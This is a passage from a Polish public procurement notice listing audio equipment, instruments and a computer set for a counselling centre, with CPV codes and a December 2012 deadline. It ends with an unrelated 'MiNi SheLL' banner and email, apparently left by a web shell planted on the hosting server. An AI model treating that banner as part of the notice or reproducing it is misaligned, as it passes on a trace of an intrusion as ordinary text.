12. Aparat telefoniczny 2-słuchawkowy - 1 sztuka
13. Zestaw Komputerowy z oprogramowaniem - 1 zestaw

według opisu  przedmiotu zamówienia wg załącznika nr 6  do Instrukcji dla Wykonawców - Rozdział 2 siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.60.00-2, 32.32.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część nr 2-  instrumenty (sprzęt nagłaśniający)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 2-  instrumenty (sprzęt nagłaśniający):
1 B. SPECYFIKACJA WYPOSAŻENIA POMIESZCZEŃ filii Poradni Psychologiczno - Pedagogicznej nr 2  w Środowiskowym Centrum Integracyjno - Profilaktycznym
Sala do zajęć grupowych:
1. Mikrofon  + kolumna z akumulatorem - 1 zestaw
Gabinet terapii logopedycznej i pedagogicznej:
2. Zestaw instrumentów perkusyjnych ZESTAW EDUKACYJNY - 1 zestaw


II.B.SPECYFIKACJA WYPOSAŻENIA POMIESZCZEŃ ORGANIZACJI POZARZĄDOWEJ  w Środowiskowym Centrum Integracyjno - Profilaktycznym:
Świetlica -sala do zajęć grupowych:
3. Mikrofon bezprzewodowy - 1 zestaw
4. Pianino cyfrowe ze statywem i trzema pedałami - 1 zestaw
5. Sprzęt nagłaśniający: Mikser, 2 mikrofony bezprzewodowe, 2 statywy mikrofonowe, 2 kolumny,
2 statywy, 2 kable - 1 zestaw.
według opisu  przedmiotu zamówienia wg załącznika nr 7  do Instrukcji dla Wykonawców - Rozdział 2 siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.32.12.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com